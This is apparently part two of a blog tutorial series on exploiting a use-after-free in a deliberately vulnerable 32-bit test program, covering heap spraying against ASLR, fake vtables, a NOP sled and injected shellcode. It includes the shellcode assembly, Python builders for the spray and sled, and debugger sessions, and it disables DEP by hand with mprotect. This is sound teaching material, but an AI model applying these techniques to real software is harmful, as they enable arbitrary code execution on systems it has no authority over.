This is part two of a series of articles. Here is part one.
Step 2: Calling a pre-defined routine in the victim with ASLR enabled
In step 1 in the first article of this series we disabled ASLR in order to have the buffer for the decoded third chunk at a fixed address. Now we will raise the bar for the exploit by enabling ASLR for data, that is, for memory on the stack and heap. We will keep ASLR disabled for code (by preventing GCC from creating a position-independent executable (PIE) with the -Wl,-no-pie flag), so our routine pwned_destructor still lives at a fixed address.
So how can we defeat ASLR? We somehow need to find out the address of the third chunk’s buffer (because it contains the fake vtable), even though it is now a random value that differs from one invocation of the victim program to the next. We are helped here by the fact that we have a 32-bit program on our hands. As it turns out, with the somewhat limited address space of 32-bit programs (4 GB), there are not that many addresses for the kernel to choose from, especially for large memory blocks. The plot below shows the address ranges (start and end addresses of the memory blocks) for different block sizes, as obtained by repeated invocations of a program that just calls malloc.
[Figure: address ranges of memory blocks returned by malloc, by allocation size (with 14 random bits for mmap)]
As you can see, if we allocate large enough blocks (100 MB in the figure), all address ranges overlap to some extent. This means there is an address range that is guaranteed to be included in each and every memory block we allocate. The size threshold above which this is the case depends on a kernel parameter (/proc/sys/vm/mmap_rnd_compat_bits), which tells the kernel how many random bits it should use for the mmap system call (mmap is used internally by malloc for large allocations). The default seems to be 8 bits (see this article for more details). With this value, a memory block of 100 MB always gets allocated at the same address. To make things more interesting, I cranked up the value to 14 bits. With that value you get the behavior shown in the figure.
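To get a feeling for why large blocks overlap, here is a rough back-of-the-envelope sketch in Python. It rests on a simplified model that is my assumption, not something measured: the base address of a large mapping is shifted by a random whole number of 4 KB pages between 0 and 2^bits - 1, and nothing else influences the placement. The function names are made up for this illustration, and the real kernel behavior can differ, so treat the numbers as estimates only.

```python
PAGE_SIZE = 4096  # assumed page size (typical for x86)


def randomization_span(rnd_bits: int, page_size: int = PAGE_SIZE) -> int:
    """Largest possible shift (in bytes) between two base addresses in this model."""
    return ((1 << rnd_bits) - 1) * page_size


def guaranteed_overlap(block_size: int, rnd_bits: int,
                       page_size: int = PAGE_SIZE) -> int:
    """Bytes that lie inside the block for every possible base address (0 if none)."""
    return max(0, block_size - randomization_span(rnd_bits, page_size))


if __name__ == "__main__":
    MB = 1024 * 1024
    for bits in (8, 14):
        for size_mb in (1, 10, 100):
            overlap = guaranteed_overlap(size_mb * MB, bits)
            print(f"{bits:2d} bits, {size_mb:3d} MB block: "
                  f"{overlap / MB:6.1f} MB always mapped")
```

In this model a block only has a guaranteed common range once it is larger than the randomization span, which is roughly 64 MB for 14 bits. That is in line with the 100 MB blocks in the figure overlapping while the smaller ones do not necessarily do so.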
So how does this knowledge help us with the exploit? We need a large memory allocation (e.g. 100 MB) to happen in the program, and our fake vtable must be located at an address that is always included in the allocated memory block. This is actually quite easy to accomplish. In the previous step we put just one copy of the vtable in the third chunk. But we can make the third chunk much larger and put lots of copies of the vtable in it. Then, as the pointer to the vtable (or, to be more precise, to one copy of it), we no longer use the start address of the buffer for the chunk’s data (which changes) but an address somewhere in the middle of this buffer (which stays the same). Because the buffer is located on the heap and we sort of "spray" data onto it, this technique is called heap spraying.
However, as described here, it is only possible with 32-bit programs. Because 64-bit programs have much larger address spaces (256 TB), it is in general not possible to allocate memory blocks large enough to get overlapping address ranges. For them, this technique must be combined with a way to find out the program’s address space layout (at least partially), but this is beyond the scope of this series of articles. If this has made you curious, you can read more about it here, for example.
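The spray itself is simple to build. The following Python snippet is a minimal sketch of how the data for such a chunk could be produced; it is not the actual exploit script. The helper names are hypothetical, the pointer value is the address of pwned_destructor on my machine, and the HTTP chunk framing around the data is left out. The chunk data is base64-encoded because that is how the victim in this series expects it.

```python
import base64
import struct


def build_vtable_spray(target_addr: int, size: int) -> bytes:
    """Fill `size` bytes with copies of a 32-bit little-endian pointer."""
    if size % 4 != 0:
        raise ValueError("size must be a multiple of the pointer size (4 bytes)")
    entry = struct.pack("<I", target_addr)  # one vtable entry
    return entry * (size // 4)


def encode_chunk(data: bytes) -> bytes:
    """Base64-encode the raw chunk data (assumed transport encoding)."""
    return base64.b64encode(data)


if __name__ == "__main__":
    # Small size for demonstration; the real spray would be about 100 MB.
    spray = build_vtable_spray(0x0804A3DD, 64)
    print(spray[:8].hex())
    print(len(encode_chunk(spray)))
```

Because every 4-byte slot holds the same pointer, it doesn’t matter which slot the overwritten object ends up pointing to, as long as the address is 4-byte aligned.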
What a heap spray looks like in practice is shown in the debugger session below. We take a closer look at the first HTTPChunk object (which got overwritten) right before it’s about to be deleted.
Breakpoint 1, main () at ./uaf-overwrite-vtable.cpp:179
177 delete p_chunk;
pwndbg> x/3dx p_chunk
0x98a3c40: 0xe9000000 0x78787878 0x78787878 (1)
pwndbg> x/16dx 0xe9000000
0xe66a9010: 0x0804a3dd 0x0804a3dd 0x0804a3dd 0x0804a3dd (2)
0xe66a9020: 0x0804a3dd 0x0804a3dd 0x0804a3dd 0x0804a3dd
0xe66a9020: 0x0804a3dd 0x0804a3dd 0x0804a3dd 0x0804a3dd
0xe66a9020: 0x0804a3dd 0x0804a3dd 0x0804a3dd 0x0804a3dd
pwndbg> i sym 0x0804a3dd (3)
pwned_destructor() in section .text of /home/consti/Programmieren/Exploits/uaf-overwrite-vtable
We can see (1) that the object’s pointer to its vtable now points to the address 0xe9000000. If we inspect the memory at this address we see (2) that it indeed contains pointers to the pwned_destructor routine (3), which make up the vtable. So where does this magic value 0xe9000000 come from? I found it by running the program a few times and choosing a value that was always included in the buffer for the third chunk (somewhere in the middle of it). It only needs to be aligned on a double-word (4-byte) boundary; then it’s bound to hit a copy of the vtable.
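The manual search for such a value can be expressed in a few lines of Python. This is only a sketch of the idea: the function names are hypothetical, and the start addresses in the example are illustrative values, not a record of my actual runs. It also assumes that the buffer start addresses themselves are at least 4-byte aligned, which is what you would expect from malloc.

```python
def common_range(starts, size):
    """Return (low, high) of the addresses covered in every run, or None."""
    low = max(starts)           # highest observed start address
    high = min(starts) + size   # lowest observed end address (exclusive)
    return (low, high) if low < high else None


def pick_aligned_address(starts, size, alignment=4):
    """Pick an aligned address near the middle of the common range."""
    rng = common_range(starts, size)
    if rng is None:
        raise ValueError("the observed buffers do not overlap")
    low, high = rng
    middle = (low + high) // 2
    candidate = middle - (middle % alignment)  # round down to the alignment
    if candidate < low:
        candidate += alignment
    if candidate >= high:
        raise ValueError("no aligned address inside the common range")
    return candidate


if __name__ == "__main__":
    # Illustrative start addresses of a 100 MB buffer from three runs.
    starts = [0xE66A9010, 0xE5C3F010, 0xE7F21010]
    # A coarse alignment yields a "round" value that is easy to remember.
    print(hex(pick_aligned_address(starts, 0x6400000, alignment=0x1000000)))
```

The more runs you feed in, the smaller the common range gets, and the more confident you can be that the chosen address really is inside the buffer every time.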
Step 3: Injecting the malicious code into the victim
So far, we haven’t injected any code (that we would control) into the program but used a routine already contained in the program. As I have mentioned, this is normally not a realistic scenario. So we will now ditch the routine and see how we can inject our own code.
First off, the injected code must of course be self-contained and position-independent, that is, it must be able to run from any location in memory and must not rely on anything other than system calls. This type of code is usually known as shellcode. The shellcode we will use looks like this:
.intel_syntax noprefix          # the code below uses Intel syntax
.code32
    jmp l_data
l_code:
    mov ebx, 2                  # file descriptor, 2 = stderr
    pop ecx                     # pointer to buffer (pushed by the call below)
    mov edx, 30                 # buffer size
    mov eax, 4                  # system call number, 4 = write
    int 0x80                    # invoke system call
    ret                         # return to the caller of the "destructor"
l_data:
    call l_code                 # call to push the string's address onto the stack
    .asciz "\x1b[31mYou've been pwned!!!\x1b[0m\n"
The term shellcode is actually a bit misleading here, as we don’t start a shell but just print a string. As you can see, the code is quite simple. First, it performs the JMP-CALL-POP trick to get the address of the string we want to print onto the stack. Then it invokes the write system call and returns (because it will be called as a method via the vtable). I translated the code into a raw binary (just the code, no headers and other stuff) using GNU as and objdump so that the Python script that performs the exploit can use it.
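If you don’t read assembly fluently, the following Python snippet does roughly the same thing as the shellcode: it writes the string to a file descriptor with a single write call. It is only an illustration of the effect; the function name is made up, and of course nothing like this runs inside the victim. It also shows where the buffer size of 30 comes from: it is the length of the string without the terminating null byte that .asciz appends.

```python
import os

# The string the shellcode prints (red text via ANSI escape sequences).
MESSAGE = b"\x1b[31mYou've been pwned!!!\x1b[0m\n"
BUFFER_SIZE = 30  # the value the shellcode loads into edx


def emulate_shellcode(fd: int = 2) -> int:
    """Write the message to `fd` (2 = stderr) and return the bytes written."""
    return os.write(fd, MESSAGE[:BUFFER_SIZE])


if __name__ == "__main__":
    # The size passed to write must match the length of the string.
    assert len(MESSAGE) == BUFFER_SIZE
    emulate_shellcode()
```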
So how are we going to deliver this code to the victim program? We will use another chunk for that. But we again need a way to use a fixed start address (which we will put into the vtable), despite the start address of the chunk’s buffer being random. As you might have guessed, heap spraying, described in the previous step, comes to the rescue once more. But instead of putting lots of copies of our code into the chunk (as we did with the vtable), we will use a technique known as a NOP slide (or NOP sled). You might be familiar with this technique if you know a bit about classical stack overflows. It means that we create a large chunk (again 100 MB), fill it almost completely with NOP instructions and put our shellcode at the very end of it. Then we pick an address that is guaranteed to be included in the chunk’s buffer, use it as the pointer to our code and put it in our fake vtable. This address will definitely point to a NOP, and when the CPU finally jumps to it, program execution will "slide" down the NOPs until it reaches the shellcode. Note that we don’t care about null bytes in the shellcode, as we don’t deliver it as a string but as base64-encoded data.
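Building such a chunk takes only a few lines. The snippet below is a minimal sketch, not the actual exploit script: the function name is hypothetical, and the shellcode in the example is a one-byte placeholder (a single ret instruction) rather than the real binary produced from the assembly above.

```python
import base64

NOP = b"\x90"  # single-byte x86 NOP instruction


def build_nop_sled(shellcode: bytes, total_size: int) -> bytes:
    """Return `total_size` bytes: NOPs first, the shellcode at the very end."""
    if len(shellcode) > total_size:
        raise ValueError("shellcode does not fit into the requested size")
    return NOP * (total_size - len(shellcode)) + shellcode


if __name__ == "__main__":
    placeholder = b"\xc3"  # placeholder payload (ret), NOT the real shellcode
    # Small size for demonstration; the real chunk would be about 100 MB.
    sled = build_nop_sled(placeholder, 64)
    print(len(sled), sled[-4:].hex())
    print(len(base64.b64encode(sled)))
```

Putting the shellcode at the very end maximizes the number of addresses that lead to it: a jump to any byte before the shellcode lands on a NOP and slides forward.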
In the following debugger session we will take a closer look at this fourth chunk containing the code.
Breakpoint 1, main () at ./uaf-overwrite-vtable.cpp:179
177 delete p_chunk;
pwndbg> x/3dx p_chunk
0x8effc40: 0xe2000000 0x78787878 0x78787878 (1)
pwndbg> x/8dx 0xe2000000
0xe2000000: 0xdbc00000 0xdbc00000 0xdbc00000 0xdbc00000 (2)
0xe2000010: 0xdbc00000 0xdbc00000 0xdbc00000 0xdbc00000
pwndbg> x/8bx 0xdbc00000
0xdbc00000: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
pwndbg> x/8i 0xdbc00000
0xdbc00000: nop (3)
0xdbc00001: nop
0xdbc00002: nop
0xdbc00003: nop
0xdbc00004: nop
0xdbc00005: nop
0xdbc00006: nop
0xdbc00007: nop
pwndbg> x/12i (0xd9b52010 + 0x6400000 - 60)
0xdff51fd4: nop
0xdff51fd5: nop
0xdff51fd6: nop
0xdff51fd7: jmp 0xdff51fec (4)
0xdff51fd9: mov ebx,0x1
0xdff51fde: pop ecx
0xdff51fdf: mov edx,0x1e
0xdff51fe4: mov eax,0x4
0xdff51fe9: int 0x80
0xdff51feb: ret
0xdff51fec: call 0xdff51fd9
0xdff51ff1: sbb ebx,DWORD PTR [ebx+0x33]
pwndbg> x/1s 0xdff51ff1
0xdff51ff1: "\033[31mYou've been pwned!!!\033[0m\n" (5)
But before we do that, we note that our overwritten object still contains a pointer to the chunk containing our fake vtables (1), although with a different value than before (0xe2000000 instead of 0xe9000000). And of course the vtable looks different now as well. It contains pointers with the value 0xdbc00000 (2). So what is at this address? If we display the memory as instructions (3) we see lots of NOPs. So the address is located somewhere in the buffer for the decoded fourth chunk, in the NOP slide. If we examine the end of this buffer (0xd9b52010 is the start address of the buffer, conveniently printed out by the program) we find our shellcode (4) together with the string it prints (5).
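The addresses from this session can be cross-checked with a bit of arithmetic. The following Python snippet is just such a sanity check; all values are taken from the debugger output above (they belong to this one run), and the helper names are made up for the illustration.

```python
BUFFER_START = 0xD9B52010     # start of the fourth chunk's buffer
BUFFER_SIZE = 0x6400000       # 100 MB
SLED_ENTRY = 0xDBC00000       # value stored in the fake vtable
SHELLCODE_START = 0xDFF51FD7  # address of the shellcode's first instruction


def in_buffer(addr: int, start: int, size: int) -> bool:
    """True if `addr` lies inside the buffer [start, start + size)."""
    return start <= addr < start + size


def nops_to_slide(entry: int, shellcode_start: int) -> int:
    """Number of NOPs executed between the entry point and the shellcode."""
    return shellcode_start - entry


if __name__ == "__main__":
    buffer_end = BUFFER_START + BUFFER_SIZE
    print("entry inside buffer:", in_buffer(SLED_ENTRY, BUFFER_START, BUFFER_SIZE))
    print("NOPs to slide:", nops_to_slide(SLED_ENTRY, SHELLCODE_START))
    print("shellcode length:", buffer_end - SHELLCODE_START)
```

So in this run the CPU has to work its way through tens of millions of NOPs before it reaches the shellcode, which sits in the last few dozen bytes of the buffer.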
I arrived at these two addresses (0xe2000000 and 0xdbc00000) again by running the program a few times and choosing values that were always included in the respective buffers. Interestingly, the buffer for the fourth chunk was always located 100 MB below the buffer for the third chunk. The following diagram shows the locations of the chunks’ buffers in memory and their relation (what points to what).
So when the destructor is finally called on the overwritten object, via the pointer in the vtable, the CPU will jump right into the NOP slide, execute all the NOPs until it reaches the shellcode and then the shellcode itself.
Except… it doesn’t, not yet at least. Instead, the program terminates with a segmentation fault. Why is that? Another security measure employed by modern CPUs and operating systems keeps us from succeeding. It is commonly known as data execution prevention (DEP) or W^X and means that any memory regions that are writeable by a program (on the heap or stack) are by default not executable (implemented via the NX bit). As the chunk’s buffer is of course writeable, the CPU will not execute the code in it but generate an exception which leads in turn to the segmentation fault.
So how can we get around this security measure? In the third part of this series I will show you a very clever technique that works by not injecting code into the program but something else. But for now, we will just play a bit unfair and change the permissions of the chunk’s buffer. This can be done very easily in the debugger as you can see below.
pwndbg> vmmap 0xd9b52010 (1)
Start End Perm Size Offset File
0xd9b52000 0xf6e00000 rw-p 1d2ae000 0 [anon_d9b52] +0x0
pwndbg> call (long) mprotect(0xd9b52000, 0x1d2ae000, 0x7) (2)
$4 = 0
First I use the vmmap command (provided by the pwndbg extension) to check the permissions of the buffer (1), and you can see that it’s indeed not executable (the "x" flag is missing). Then I call the mprotect system call (2) to change the permissions. Note that I don’t use the start address and size of the buffer but those of the complete memory mapping; 0x7 means "rwx". After that the exploit actually works.
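The arguments of the mprotect call deserve a short explanation. mprotect requires a page-aligned start address, which the buffer’s own start address (0xd9b52010) is not. I simply used the whole mapping, but the smallest range that would also do can be computed as in the sketch below. The function name is hypothetical, a page size of 4 KB is assumed, and the protection flag values are the ones from the Linux headers.

```python
PAGE_SIZE = 4096  # assumed page size

# Protection flags as defined in <sys/mman.h> on Linux.
PROT_READ, PROT_WRITE, PROT_EXEC = 0x1, 0x2, 0x4


def page_aligned_range(addr: int, length: int, page_size: int = PAGE_SIZE):
    """Return (start, length) of the smallest page-aligned range covering the buffer."""
    start = addr - (addr % page_size)                   # round start down
    end = addr + length
    end_aligned = -(-end // page_size) * page_size      # round end up
    return start, end_aligned - start


if __name__ == "__main__":
    start, length = page_aligned_range(0xD9B52010, 0x6400000)
    prot = PROT_READ | PROT_WRITE | PROT_EXEC
    print(f"mprotect({start:#x}, {length:#x}, {prot:#x})")
```

Combining all three flags yields 0x7, the value used in the debugger session.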
This is the end of the second article in this series. As I already said, we will defeat W^X in the third article. Stay tuned if you liked it so far…